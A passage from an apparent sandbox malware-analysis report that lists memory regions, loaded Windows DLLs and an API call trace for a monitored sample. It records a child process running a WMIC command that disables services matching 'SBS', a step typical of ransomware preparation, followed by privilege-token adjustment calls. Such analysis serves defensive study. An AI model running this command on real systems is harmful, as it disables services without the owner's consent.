"propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 5027 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5028 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5029 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5030 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5031 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5032 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5033 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5034 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5035 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5036 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 329 os_tid = 0xcb4 Thread: id = 330 os_tid = 0x594 Thread: id = 331 os_tid = 0x2d0 Process: id = "78" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x10702000" os_pid = "0xbc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "76" os_parent_pid = "0xc6c" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5050 start_va = 0x2e0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 5051 start_va = 0x300000 end_va = 0x301fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 5052 start_va = 0x310000 end_va = 0x323fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 5053 start_va = 0x330000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 5054 start_va = 0x370000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 5055 start_va = 0x3b0000 end_va = 0x3b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 5056 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 5057 start_va = 0x3d0000 end_va = 0x3d1fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 5058 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 5059 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 5060 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5061 start_va = 0x7f600000 end_va = 0x7f622fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f600000" filename = "" Region: id = 5062 start_va = 0x7f629000 end_va = 0x7f629fff entry_point = 0x0 region_type = private name = "private_0x000000007f629000" filename = "" Region: id = 5063 start_va = 0x7f62a000 end_va = 0x7f62cfff entry_point = 0x0 region_type = private name = "private_0x000000007f62a000" filename = "" Region: id = 5064 start_va = 0x7f62d000 end_va = 0x7f62dfff entry_point = 0x0 region_type = private name = "private_0x000000007f62d000" filename = "" Region: id = 5065 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5066 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5067 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5068 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5069 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5070 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 5071 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5072 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5073 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 5074 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5075 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 5076 start_va = 0x2f0000 end_va = 0x2f3fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 5077 start_va = 0x3e0000 end_va = 0x49dfff entry_point = 0x3e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5078 start_va = 0x4a0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5079 start_va = 0x4e0000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 5080 start_va = 0x810000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 5081 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5082 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 5083 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 5084 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5085 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5086 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5087 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5088 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5089 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5090 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5091 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5092 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5093 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5094 start_va = 0x7f500000 end_va = 0x7f5fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f500000" filename = "" Region: id = 5095 start_va = 0x7f626000 end_va = 0x7f628fff entry_point = 0x0 region_type = private name = "private_0x000000007f626000" filename = "" Region: id = 5096 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5097 start_va = 0x300000 end_va = 0x300fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 5098 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 5099 start_va = 0x520000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 5100 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 5101 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5102 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5103 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5104 start_va = 0x820000 end_va = 0xb56fff entry_point = 0x820000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5105 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5106 start_va = 0x6f0000 end_va = 0x7d8fff entry_point = 0x6f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5107 start_va = 0x530000 end_va = 0x533fff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5108 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 5109 start_va = 0xb60000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 5110 start_va = 0xcc0000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 5111 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5112 start_va = 0x560000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 5113 start_va = 0xb60000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 5114 start_va = 0xcb0000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 5115 start_va = 0x6f0000 end_va = 0x7cefff entry_point = 0x6f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 5116 start_va = 0xe30000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 5117 start_va = 0x560000 end_va = 0x560fff entry_point = 0x560000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 5118 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 5119 start_va = 0x570000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5120 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 5121 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5122 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5123 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5124 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5125 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5126 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 5127 start_va = 0x590000 end_va = 0x5b9fff entry_point = 0x590000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5128 start_va = 0x5370000 end_va = 0x54f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005370000" filename = "" Region: id = 5129 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5130 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5131 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x590000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 5132 start_va = 0x5500000 end_va = 0x5680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005500000" filename = "" Region: id = 5133 start_va = 0x5690000 end_va = 0x6a8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005690000" filename = "" Region: id = 5134 start_va = 0x5a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 5135 start_va = 0x5b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 5136 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 5137 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5138 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 5139 start_va = 0xb60000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 5140 start_va = 0xca0000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 5141 start_va = 0x5c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 5142 start_va = 0xcc0000 end_va = 0xd77fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 5143 start_va = 0xe20000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 5144 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 5145 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 5146 start_va = 0x6a90000 end_va = 0x6b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a90000" filename = "" Region: id = 5147 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 5148 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 5149 start_va = 0x7d0000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 5150 start_va = 0xb60000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 5151 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 5152 start_va = 0xc10000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 5153 start_va = 0xc20000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 5154 start_va = 0xc60000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 5155 start_va = 0xd80000 end_va = 0xdbffff entry_point = 0x0 region_type = private name = "private_0x0000000000d80000" filename = "" Region: id = 5156 start_va = 0x7f4fa000 end_va = 0x7f4fcfff entry_point = 0x0 region_type = private name = "private_0x000000007f4fa000" filename = "" Region: id = 5157 start_va = 0x7f4fd000 end_va = 0x7f4fffff entry_point = 0x0 region_type = private name = "private_0x000000007f4fd000" filename = "" Region: id = 5158 start_va = 0x7f623000 end_va = 0x7f625fff entry_point = 0x0 region_type = private name = "private_0x000000007f623000" filename = "" Region: id = 5159 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5160 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5161 start_va = 0xbe0000 end_va = 0xbf4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 5162 start_va = 0xbe0000 end_va = 0xc08fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Thread: id = 333 os_tid = 0xc34 [0123.586] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0123.586] __set_app_type (_Type=0x1) [0123.586] __p__fmode () returned 0x77ac4d6c [0123.586] __p__commode () returned 0x77ac5b1c [0123.586] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0123.586] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0123.586] ??0CHString@@QAE@XZ () returned 0x13495ec [0123.586] ??0CHString@@QAE@XZ () returned 0x13498fc [0123.586] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0123.586] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0123.587] _onexit (_Func=0x1340a20) returned 0x1340a20 [0123.587] _onexit (_Func=0x1340a30) returned 0x1340a30 [0123.587] _onexit (_Func=0x1340a50) returned 0x1340a50 [0123.587] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0123.587] ResolveDelayLoadedAPI () returned 0x770fcd50 [0123.587] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0123.589] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0123.594] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0x5f74f0) returned 0x0 [0123.604] GetCurrentProcess () returned 0xffffffff [0123.604] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x3afb98 | out: TokenHandle=0x3afb98*=0x158) returned 1 [0123.604] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x3afb94 | out: TokenInformation=0x0, ReturnLength=0x3afb94) returned 0 [0123.604] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x813a38, TokenInformationLength=0x118, ReturnLength=0x3afb94 | out: TokenInformation=0x813a38, ReturnLength=0x3afb94) returned 1 [0123.605] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x813a38*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0123.605] CloseHandle (hObject=0x158) returned 1 [0123.605] SetThreadUILanguage (LangId=0x0) returned 0x409 [0123.607] _vsnwprintf (in: _Buffer=0x813ac8, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x3afb20 